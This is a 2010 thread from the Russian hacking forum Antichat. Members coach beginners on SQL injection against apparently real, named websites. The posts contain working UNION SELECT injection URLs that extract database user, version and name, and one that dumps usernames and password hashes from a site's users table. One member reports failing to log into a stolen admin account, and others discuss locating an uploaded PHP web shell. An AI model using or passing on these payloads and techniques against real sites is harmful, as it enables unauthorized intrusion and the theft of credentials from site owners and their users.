ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11561  
Старый 14.02.2010, 14:16
Аватар для keng
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189

Репутация: 124
По умолчанию

Цитата:
Сообщение от _iks_  
Для начала неплохо бы найти инклуд, если расширение как у картинки
Я предположил, что он уже загрузил готовый шелл (*.php) и просто не может найти, куда именно (т.е., как к нему обратиться после загрузки). Он ведь написал - "точно знаю, что шелл в базе".
 
Ответить с цитированием

  #11562  
Старый 14.02.2010, 14:19
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Цитата:
Сообщение от _iks_  
Фильтруется просто скорее всего. Кавычку ты ставил? Складывал\вычитал значения?
Ну да, складывал и вычитал, и ордэром проверял. Но дело в том что когда я у себя проверял(ну у меня смотрит строка или число, а если там запрос к приверу id=1 and 1=2, то он отправляет как строку), то у меня тоже открывается та же страница.
nerezus назвал мой метод "Самый говнокодистый говнокод в этой теме."

Код:
function secure($par) {
  $numb = array("1","2","3","4","5","6","7","8","9","0","-");
   if( get_magic_quotes_gpc())
	   {
           $link = stripslashes($par);
	   }
   $l=$par+1-1;
   if ((string)$l==(string)$par) {
	   
     $par=(string)$par;
     $new_par="";
     for ($i=0;$i<>strlen($par);$i++) {
       if (in_array($par{$i},$numb)) {
       $new_par=$new_par.$par{$i};
	   }
      if ($new_par<"-2147483648" || $new_par>"2147483647") $new_par="1";
	 $new_par=(int)$new_par;
     }
   }
   else
   {
   $new_par=mysql_real_escape_string($par);
   }
   return $new_par;
}
по етому разобраться надо
 
Ответить с цитированием

  #11563  
Старый 14.02.2010, 17:09
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

Цитата:
Сообщение от keng  
Я предположил, что он уже загрузил готовый шелл (*.php) и просто не может найти, куда именно (т.е., как к нему обратиться после загрузки). Он ведь написал - "точно знаю, что шелл в базе".
да да то4но заяруяется ну не знаю куда ..??
 
Ответить с цитированием

  #11564  
Старый 14.02.2010, 17:12
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Код:
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi  on(),database()),6,7+--
wildshaman скажи почему при вводе твоего запроса, появляется тоже самое, что и
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4 -- ?
З.Ы. Подскажите мб есть какая-то статья, в которой есть основные команды в языке sql.
 
Ответить с цитированием

  #11565  
Старый 14.02.2010, 17:46
Аватар для jecka3000
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

CyberHunter

при запросе
Цитата:
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7+--
Выводится тек.юзер, версия БД и имя бд.

а при запросе:
Цитата:
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4 --
выводится принтабельное поле, точнее при это запросе ничего не выводится,т.к. не правильно подобраны столбцы. Добавь еще .....5,6,7--

П.С, вот хорошая статья: http://forum.antichat.ru/thread104591.html

Последний раз редактировалось jecka3000; 14.02.2010 в 17:53..
 
Ответить с цитированием

  #11566  
Старый 14.02.2010, 17:53
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Цитата:
Сообщение от CyberHunter  
Код:
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi  on(),database()),6,7+--
wildshaman скажи почему при вводе твоего запроса, появляется тоже самое, что и
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4 -- ?
Почему то же самое?
Цитата:
З.Ы. Подскажите мб есть какая-то статья, в которой есть основные команды в языке sql.
http://www.mysql.ru/docs/mysql-man-5.0-en/sql-syntax.html#select
 
Ответить с цитированием

  #11567  
Старый 14.02.2010, 20:09
Аватар для Tudesky
Tudesky
Новичок
Регистрация: 14.02.2010
Сообщений: 3
Провел на форуме:
2961

Репутация: 0
По умолчанию

Вот что-то неочень могу разобраться с этой скулей http://vip-study.by/index.php?id=-1+union+select+1,2,3,4,5,concat(username,0x3a,pass word),7,8,9,10,11,12,13,14,15,16+from+users--

пароль расшифровали только, когда ввожу его в админку не заходит
 
Ответить с цитированием

  #11568  
Старый 14.02.2010, 20:21
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

jecka3000 спс!
Еще хотел бы спросить при вводе команд типа union select, нужно ставить знак + между ними?
И еще, вот допустим нашел я столбцы и т.д. и если хочу увидеть имя БД, то вместо одного номера нужно ввести нужную команду?
 
Ответить с цитированием

  #11569  
Старый 14.02.2010, 20:22
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от Tudesky  
Вот что-то неочень могу разобраться с этой скулей http://vip-study.by/index.php?id=-1+union+select+1,2,3,4,5,concat(username,0x3a,pass word),7,8,9,10,11,12,13,14,15,16+from+users--

пароль расшифровали только, когда ввожу его в админку не заходит
Значит пароль не от админки, либо расшифрован неправильно.

Цитата:
Сообщение от CyberHunter  
jecka3000 спс!
Еще хотел бы спросить при вводе команд типа union select, нужно ставить знак + между ними?
+ в URL-кодировке - пробел.
Цитата:
Сообщение от CyberHunter  
]И еще, вот допустим нашел я столбцы и т.д. и если хочу увидеть имя БД, то вместо одного номера нужно ввести нужную команду?
Не понял...

Последний раз редактировалось mailbrush; 14.02.2010 в 20:25..
 
Ответить с цитированием

  #11570  
Старый 14.02.2010, 20:34
Аватар для jecka3000
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

Цитата:
Сообщение от CyberHunter
]И еще, вот допустим нашел я столбцы и т.д. и если хочу увидеть имя БД, то вместо одного номера нужно ввести нужную команду?
нужно вместо принтабельного столбца ввести слово database()
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ